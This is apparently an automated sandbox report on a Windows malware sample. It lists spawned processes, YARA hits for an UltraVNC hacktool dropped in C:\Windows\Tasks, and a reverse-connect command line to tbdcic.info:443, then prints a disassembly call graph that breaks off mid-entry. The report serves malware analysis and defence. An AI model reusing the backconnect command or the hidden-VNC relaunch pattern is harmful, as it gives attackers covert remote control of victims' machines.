                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:07:38:15
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 8
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:07:38:23
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:07:38:23
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:07:38:25
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 4
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:07:38:29
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c "C:\Windows\Tasks\3889122.cmd"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:31
                                                                          Start time:07:38:29
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:07:38:30
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:taskkill /f /im browser_sn.exe
                                                                          Imagebase:0x1e0000
                                                                          File size:74'240 bytes
                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:07:38:30
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:34
                                                                          Start time:07:38:32
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:35
                                                                          Start time:07:38:32
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 8
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:07:38:40
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:37
                                                                          Start time:07:38:40
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 4
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:38
                                                                          Start time:07:38:44
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 600
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:18.9%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:26.4%
                                                                            Total number of Nodes:1626
                                                                            Total number of Limit Nodes:16
                                                                            execution_graph 11259 404852 11260 404867 11259->11260 11264 404895 11260->11264 11266 40269a ??3@YAXPAX ??3@YAXPAX 11260->11266 11261 40ce0a memmove 11262 4048a3 11261->11262 11264->11261 11265 404886 ??3@YAXPAX 11265->11260 11266->11265 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 